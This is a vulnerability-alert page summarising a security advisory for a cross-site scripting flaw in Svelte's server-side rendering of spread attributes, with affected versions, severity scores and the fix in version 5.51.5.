Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
5.1
Old Svelte Software Can Let Hackers Run Malicious Code in Browsers
CVE-2026-27121
GHSA-f7gr-6p89-r883
Summary
Old versions of Svelte, a popular web development framework, can let attackers inject malicious code in web pages. This can happen if an application uses user data as HTML attributes, allowing hackers to run code in users' browsers. To stay safe, update to the latest version of Svelte, at least 5.51.5.
What to do
- Update GitHub Actions svelte to version 5.51.5.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| GitHub Actions | svelte | <= 5.51.4 | 5.51.5 |
| svelte | svelte | <= 5.51.5 | – |
Original title
Svelte affected by cross-site scripting via spread attributes in Svelte SSR
Original description
Versions of svelte prior to 5.51.5 are vulnerable to cross-site scripting (XSS) during server-side rendering. When using spread syntax to render attributes from untrusted data, event handler properties are included in the rendered HTML output. If an application spreads user-controlled or external data as element attributes, an attacker can inject malicious event handlers that execute in victims' browsers.
nvd CVSS3.1
5.4
nvd CVSS4.0
5.1
Vulnerability type
CWE-79
Cross-site Scripting (XSS)
Published: 19 Feb 2026 · Updated: 12 Mar 2026 · First seen: 6 Mar 2026